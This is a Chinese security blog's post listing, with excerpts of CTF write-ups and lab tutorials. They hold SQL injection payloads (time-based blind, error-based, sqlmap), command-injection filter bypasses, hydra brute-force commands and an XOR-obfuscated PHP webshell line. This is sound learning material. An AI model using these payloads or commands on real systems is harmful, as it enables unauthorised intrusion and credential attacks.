自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(57)
  • 资源 (1)
  • 收藏
  • 关注

原创 记一次王道C语言week2-day6作业

week2-day6作业,做个记录

2022-06-13 21:35:10 197

原创 ubuntu环境下python3换源

国内可用的两个源:http://pypi.douban.com/simple/https://pypi.tuna.tsinghua.edu.cn/simple临时换源:(以requests库为例子)pip install -i https://pypi.tuna.tsinghua.edu.cn/simple requests在~/.pip/pip.conf 配置文件中插入(若没有创建文件即可):[global] index-url = https://pypi.tuna.tsinghua.e

2021-07-27 21:41:39 945

原创 AWCTF萌新赛web题WP

web1、pacman一个游戏,看到题目直接看网页源代码因为不能邮右键,所以直接在view-source:加网址view-source:http://49.232.149.138:11521/pacman/看到两个js文件,都打开在index.js中发现flagbase64解密然后将解密出来的那个js代码放入控制台中,然后能出来flag...

2020-12-05 20:38:30 782 3

原创 祥云杯--Command

命令执行漏洞尝试127.0.0.2|ls(|:无论左边是false还是true,右边都会执行)发现了文件夹下有index.php,我们首先需要把它读出来(题目过滤了空格还有cat命令,也过滤了index和php字符串)我们尝试收发现可以用c\a\t ind\e\x p\h\p来代替空格可以用<或者%09来代替burpsuite下可用%09(浏览器下可能不成功)由indexelse if(preg_match("/.*f.*l.*a.g./", $ip)){flag可能是..

2020-11-23 14:10:48 402 1

原创 第三届信息安全铁人三项第二赛区部分wp

为啥是部分wp呢。。。还不是因为太菜了。。。企业环境渗透进去看到主页搜索一下信息,发现有一个用户信息的文件下载下来,几行没用的信息,随便点了几下,发现flag4主页有一个文件上传的点,先不考虑,一般主页安全都做得比较好,最后再看然后御剑扫一下发现一个test目录,访问又一个文件上传,这个测试安全防护可能比较差,写个一句话上传上传点没有任何防护,上传成功蚁剑连接在根目录发现flag5剩下的因水平问题没有做出来,当时比赛事用nmap扫描端口发现开放了ssh,3389远程桌面

2020-11-14 15:07:14 1010

原创 sql报错注入基础讲解

报错注入:构造payload让信息通过错误提示回显出来应用场景:查询不回显内容,会打印错误信息php代码:if($row){ echo 'you login name:'.$row['username']';}else{ print_r(mysql_errot());}如果能让错误信息中返回数据库的内容,即可实现sql注入凡是可以让错误信息显示的语句,都能实现报错注入floor()报错注入的方法select count(*) from information_schema.ta

2020-09-20 17:57:12 498

原创 基于SQLI的SQL时间盲注

第一步 判断注入点与注入类型?id=1’ and sleep(10) %23对比没有使用sleep()函数时的状态如下:下面基于时间盲注进行数据库信息获取第二步 获取数据库长度id=1’ and if((length(database())=8),1,sleep(5)) %23判断得数据库长度为8第三步探测数据库其他信息(1)判断数据库名?id=1’ and if(ascii(substr(database(),1,1)=115,1,sleep(5))–+数据库名的第一个字母为s

2020-08-27 12:42:54 392

原创 第四届“强网杯”全国网络安全挑战赛部分WP

主动题目如下: <?phphighlight_file("index.php");if(preg_match("/flag/i", $_GET["ip"])){ die("no flag");}system("ping -c 3 $_GET[ip]");?> 先用一个ls命令尝试一下回显只要读出flag.php即可得到flag而题目的代码有正则过滤flag这里用到模糊查询即可得到flagFunhash题目代码如下<?phpinclude

2020-08-24 14:27:21 786 1

原创 sql文件头注入

实验原理1.常见的HTTP请求头有:(1)HostHost请求报头域主要用于指定被请求资源的Internet主机和端口号。 如:Host: localhost:8088(2)User-AgentUser-Agent请求报头域允许客户端将它的操作系统、浏览器和其他属性告诉服务器。登录一些网站时,很多时候都可以见到显示我们的浏览器、系统信息,这些都是此头的作用。 如:User-Agent: Mozilla/5.0(3)RefererReferer包含一个URL,代表当前访问URL的上一个URL,也

2020-08-21 15:04:51 404

原创 基于SQLI的POST字符型SQL注入

实验原理1.POST方式概述   使用 POST 方式提交数据,注入点位置在 POST 数据部分,常发生在表单中。2.GET和POST的区别:语义上的区别,get用于获取数据,post用于提交数据。GET - 从指定的资源请求数据。POST - 向指定的资源提交要被处理的数据get参数有长度限制(受限于url长度,具体的数值取决于浏览器和服务器的限制),而post无限制3.如何判断是否存在POST注入主要是判断输入框是否存在注入,直接输入一个 '看是否报错(如果存在盲注的话也是不会报错的),

2020-08-21 12:11:49 359

原创 sqlmap应用之cookie参数

访问dvwa,将级别调为low步骤一:如果不带入cookie参数,直接sqlmap查询失败SQLMAP直接使用url来进行注入,因为之前没有登录DVWA所以被重定向到login.php界面,直接注入失败步骤二:使用burpsuit抓包工具,在sql注入菜单处提交参数请求时进行数据抓包,获取cookies值用通用的url请求,在burp里面进行抓包,信息如图,已经获取了cookie值发现sqlmap可以跑出数据来了,构造其他语句,继续查取数据查找所有数据库查找cms数据库下的表

2020-08-21 11:11:07 4559

原创 基于phpcms的sqlmap工具注入

SQL注入攻击是一种常用的攻击网站手段。受影响的网站系统: ASP+Access、ASP+SQLServer、PHP+MySQL、PHP+Apache等。实验原理SQLMAP是一个开放源码的渗透测试工具,它可以自动探测和利用SQL注入漏洞来接管数据库服务器。它配备了一个强大的探测引擎,为最终渗透测试人员提供很多的功能,可以拖库,可以访问底层的文件系统,还可以通过带外连接执行操作系统上的命令。SQLMAP支持五种SQL注入技术:(1)基于布尔值得注入,基于时间的盲注,基于错误的盲注,UNION查询和s

2020-08-20 22:33:46 566

原创 基于phpcms的SQL手工注入

步骤一:探测目标网站有无sql注入点试探目标网站 分别在地址末尾添加单撇号、and 1=1 和 and 1=2 进行注入点探测。and 1=1and 1=2发现不需要闭合但引号,判断为注入类型为整数型第一次加单引号时,发生报错,发现了数据库类型为mysql步骤二、判断字段长度利用 order by N,从数字 1 开始替代 N,直到返回错误页面,判断字段长度为错误页面的 N-1,也就是最后一个正常页面返回。实验中N=16,错误,所以字段长度为15判断字段为15个步骤三、判断字段

2020-08-20 13:31:10 493

原创 MySQL数据库操作基础

连接数据库mysql -h 127.0.0.1 -u root -p退出数据库exit;列出数据库show databases;列出表show tables;新建数据库CREATE DATABASE 数据库名;使用数据库use 数据库名;创建表create table offices(officeCode varchar(10),city varchar(10),phone int(12),addressLine1 varchar(20));create table 表名(

2020-08-12 12:35:13 145

原创 python写m4a转MP3脚本(可移植性强)

脚本实现一般趋近于半自动化,执行脚本至于要将m4a文件拖入即可执行需要将ffmpeg文件跟脚本处于同一文件夹下ffmpeg文件下载链接https://download.csdn.net/download/qq_44060093/12698179可免费下载import osm4a_file = input("请将您要转换的m4a文件拖进来:")b=m4a_file.split('\\')m4a_path=""del b[-1]for i in b: m4a_path += i

2020-08-10 15:01:02 702

原创 Nmap扫描与RDP连接实验

一般而言,一个完整的网络安全扫描过程通常可以分为三个阶段:(1)发现目标主机或网络。(2)在发现活动目标后进一步搜集目标信息,包括对目标主机运行的操作系统类型进行识别,通过端口扫描技术可以查看该系统处于监听或运行状态的服务以及服务软件的版本等。如果目标是一个网络,还可以进一步发现该网络拓扑结构、路由设备以及主机信息。(3)根据搜集到的信息进行相关处理,进而检测出目标系统存在的安全漏洞。用nmap命令进行端口扫描查看扫描出来的系统开放端口情况,如上图所示。可见远程被扫描主机开启了3389端口。本

2020-08-04 15:56:14 1150

原创 hydra暴力破解实验

实验原理理论上只要是登录的地方,都可以进行暴力破解。虽然有的登录加入了验证码,但仍然有针对验证码的暴力破解。hydra支持常见的登录方式,如ssh ftp http mysql vnc 等协议。暴破httphydra -L user.txt -P passwd.txt x.x.x.x http-get暴破sshhydra -L user.txt -P passwd.txt x.x.x.x ssh暴破ftphydra -L user.txt -P passwd.txt x.x.x.x ft

2020-08-03 20:57:23 674

原创 HTTP协议分析

1、过滤出http协议内容。使用过滤条件语句,过滤出仅含HTTP协议的数据内容。在过滤框中输入“http”过滤语句。2、找到Post请求类数据包。在过滤框中输入过滤条件:“http.request.method == POST”3、跟踪HTTP流在该数据包上面,点击右键,选择“跟踪数据流–>HTTP流”。4、分析数据流,并查找提交的用户名和密码查看客户端与服务器之间数据交互的过程。查找用户名和密码的方法有两种:跟踪流中查找用户名、密码关键字;包列表中仅定位到POST类数据;

2020-08-02 09:46:45 183

原创 记第一次学习mfs以及简单samba服务漏洞复现

kali攻击机:192.168.142.129Metasploitable_ubuntu靶机:192.168.142.132ip:如果ifconfig无法显示ip地址,可以用>将ip显示追加到文件中,使用more命令查看一下用户名\密码:root\ubuntulinux查看版本命令:lsb_release -a如果ip不对,可以通过更改/etc/network/interfaces更改网卡信息更改完之后重启网卡命令:/etc/init.d/networking restart(

2020-07-14 09:32:00 555

原创 linux操作系统基本命令介绍(2)

whoami 查看当前用户

2020-07-09 10:06:57 123

原创 ubuntu16.04.6下安装mysql

如果刚下载乌班图建议用国内源下面是图形化界面换源方法打开系统设置种的软件和更新选择中国的服务器然后退出,退出时有提示点击重新载入,等一会即可换源成功命令行界面换源方法在/etc/apt/sources.list覆盖原来的源,写入:deb http://mirrors.aliyun.com/ubuntu/ xenial maindeb-src http://mirrors.aliyun.com/ubuntu/ xenial maindeb http://mirrors.aliy.

2020-07-09 08:19:22 149

原创 国内镜像站的使用

常用的几个国内镜像站https://developer.aliyun.com/mirror/https://mirrors.tuna.tsinghua.edu.cn/http://mirror.bit.edu.cn/web/等找到你要下载的系统,注意iso是你要下载的镜像文件的格式。想清华大学等一些大学的镜像站,有好多版本的镜像没有,以清华大学为例:这样表示没有这个镜像文件这样的表示有这个镜像文件,镜像文件在isos里...

2020-07-08 20:41:46 620

原创 linux操作系统基本命令介绍(1)

操作系统在计算机系统中承上启下的地位:向下封装硬件,向上提供操作接口

2020-07-08 11:18:28 163

原创 kali和ubuntu换国内源

kali下:编辑sources.list文件vim /etc/apt/sources.list将要更换的源写入#阿里云deb http://mirrors.aliyun.com/kali kali-rolling main non-free contribdeb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib#清华大学deb http://mirrors.tuna.tsinghua.edu.cn/ka

2020-07-07 15:10:26 858

原创 iscc2020WEB题WP

web4打开题目,没啥发现,抓包看一下一看到Cookie: token=,应该是伪造jwt

2020-05-26 16:12:11 1258

原创 网鼎杯2020Crypto题boom

打开题目,发现是一个exe文件,果断ida打开发现是一个算法,然后得到flag__main(); menu(); system("pause"); system("cls"); v7 = 70; v8 = 229; v9 = 239; v10 = 230; v11 = 22; v12 = 90; v13 = 90; v14 = 251; v15 = 54; v16 = 18; v17 = 23; v18 = 68; v19 = 106;.

2020-05-10 20:01:07 820 6

原创 sqli-Less1

最近准备拾起sql注入,sql注入虽然去年就接触学习了,但是没有从原理入手学习,不精通正好去年又学了数据库,这次颇有温故而知新的意思,温习一些以前掌握的,学习一些以前不知道的。我用sqli开始学习sql注入,环境的搭建我之前也写过,挺简单的首先看第一关,应该是没啥过滤,我们主要来学习步骤,流程,以及核心语句首先发现id=1,可以查数据再输入一个’可能有注入构造?id=1’ and...

2020-04-19 20:12:51 503

原创 闻道计算机协会CTF萌新赛-隐写术

图片隐写打开附件是一张png文件看图片黑黑绿绿的,又因为题目是隐写题的原因,猜测是LSB(有效最低位)隐写图片中的像素一般是由三种颜色构成,即三原色(绿红蓝),由这三种颜色可以组成其它各种颜色我们使用StegSolve进行分析...

2020-04-15 13:24:26 376

原创 win7安装java环境(详细步骤)

因为要用到一款工具,用java编写的,所以要下载并安装java环境下载java的网站https://www.oracle.com/java/technologies/javase-jdk8-downloads.html看自己电脑的系统以及位数我选的是64位的...

2020-04-15 12:36:33 9972

原创 闻道计算机协会CTF萌新赛-WEB

web一共五道,我乱序分析web1看题目提示,PUT your heart into this page.盲猜是个脑洞题用put传入参数heart纠结了一下午,有时候萌新题就是看脑洞web2这个题是个代码审计题查看源码,发现 extract($_GET) 一行将 get 参数转化为 php 变量.下一行判断 $who 是 web1n,并且 $girlfriend 存在的话就输...

2020-04-15 11:23:55 1007 4

原创 记一次命令执行漏洞的绕过姿势

在一个CTF平台上发现了一个命令执行的题目题目源代码如下:<?phpif(isset($_REQUEST['ip'])) { $target = trim($_REQUEST['ip']); $substitutions = array( '&' =>'', ';' =>'', '|' =>'',...

2020-04-11 11:26:27 2539

原创 变种一句话木马

墨者学院有一道例题我们打开网站发现了一串php代码<?php @$_++;$__=("`"^"?").(":"^"}").("%"^"`").("{"^"/");$___=("$"^"{").("~"^".").("/"^"`").("-"^"~").("("^"|");${$__}[!$_](${$___}[$_]); ?>看着很乱里面用了好多异或运算,但我们只需要打印出...

2020-04-04 21:43:54 929

原创 内部文件上传系统漏洞分析溯源(墨者学院)

很简单的一个文件上传漏洞,我去学到了不一样的知识实训目标1、熟悉常见中间件存在的解析漏洞;2、熟悉一句话木马的使用与制作3、熟悉常见的上传漏洞利用方法解题方向1、试探允许上传的文件类型2、观察服务器在处理完上传任务后返回的内容,获取上传路径3、尝试修改上传路径,观察服务器是否允许写入权限题目底下的神评论1、目录解析、以*.asp命名的文件夹里的文件都将会被当成ASP文件执行。...

2020-03-28 22:13:37 351

原创 server2008共享文件问题(以两个虚拟机做实验)

之前用两个虚拟机做server2008共享文件夹实验时使用了两个虚拟机,一个用于共享文件的主机称为PC1,一个用与访问共享文件夹的主机称为PC2因为pc1中管理员用户administrators用户的密码与pc1中管理员用户administrators用户的密码完全一致,所以,共享文件后pc2可以随意删除更改共享文件内容。之前在一篇文章中用如下方法可以解决pc2不可删除共享文件夹内容,在pc...

2020-03-19 23:48:41 938

原创 功放世界web新手练习区wp

第一题发现不可右键查看源代码,直接F12找到flag第二题题目描述可知应该是信息泄露类,并且应该是robots泄露我们在URL后面添加上robots.txt找到提示我们将URL添加f1ag_1s_h3re.php即可找到了flag第三题分析题目提示,应该是备份文件泄露有关的题目看提示,我们应该想到index.php备份文件泄露有几个常用的备份文件名.bak就是其一...

2020-03-18 17:21:25 828

原创 提高windows主机安全访问(以server2008为例)

1、保护用户账号安全2、实现文件共享安全3、保护文件系统安全准备:两台pc机,为别为pc1、pc2保护用户账号安全1、在pc1上创建windows用户找到开始菜单中的“管理工具”–>“计算机管理”,再点击本地用户和组前面的+,右键用户,左键新用户创建新用户时,密码一般要设置8位以上,并包含数字,大小写字母和特殊字符等三种及三种以上元素,保证密码强度。创建好user1、use...

2020-03-17 17:04:15 342

原创 xampp下搭建Sql-labs靶场

安装好xampp,如果未安装,可阅读我的博客https://editor.csdn.net/md/?articleId=104481126将Sql-labs的文件夹拷贝在xampp中的htdocs下为了更好便捷的访问,我将sqli-labs改为sqli打开sqli文件中的sql-connections下的db-creds.inc将本机中的数据库信息填写保存由db-creds.inc...

2020-03-17 14:24:03 788

原创 渗透测试工具-SET工具使用-钓鱼网站实验

记一次360实训平台的实验渗透测试工具-SET工具使用-钓鱼网站实验实验目的通过本实验理解社工平台SET的模块组成及功能,掌握利用SET软件配置钓鱼网站的方法与过程,熟悉常见社工场景的安全防护测量。实验原理开源的社会工程学利用套件SET,能够支持鱼叉式网络钓鱼攻击、网页攻击、传染媒介式(俗称木马)、建立payloaad和listener、邮件群发攻击、Arduino基础攻击、无线接入点攻...

2020-03-16 11:39:02 1689 3

原创 解决虚拟机无法安装tools的情况下传输文件

现在有些server2008的镜像没有带sp1安全包导致vmware无法安装vmwaretools而且文件共享必须还要先安装tools第一,我们可以用u盘传输第二,我们可以用镜像文件传输如图是一个刚安装完的server2008虚拟机我们将想要放入的文件做成镜像文件然后将镜像添加到虚拟机确定之后我们打开D盘就找到了我们的文件...

2020-03-12 22:32:41 4542 1

原创 CTF——杂项之千层套路

记一下一个特别有意思的杂项题,题不难,蛮有趣,而且主要是考察了一些基本的初级杂项套路将附件下载后添加.mp3后缀,发现是一首歌看到上面有一个hintbase64加密将base64解密KEY{You_are_stupid}我一开始只是以为出题者只是想稍微骚一下,让你知道你的思路有问题,如果你也这么以为那就真的是愚蠢我就愚蠢了,出题人的心理学有点东西划重点这个KEY很重要我们...

2020-03-05 12:37:39 1342 1

Metasploitable_ubuntu-book.zip

Linux Metasploitable《Metasploit渗透测试魔鬼训练营》的靶机,靶机中存在samba服务漏洞,可供小伙伴进行下载,进行靶机漏洞的简单复现

2020-07-14

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除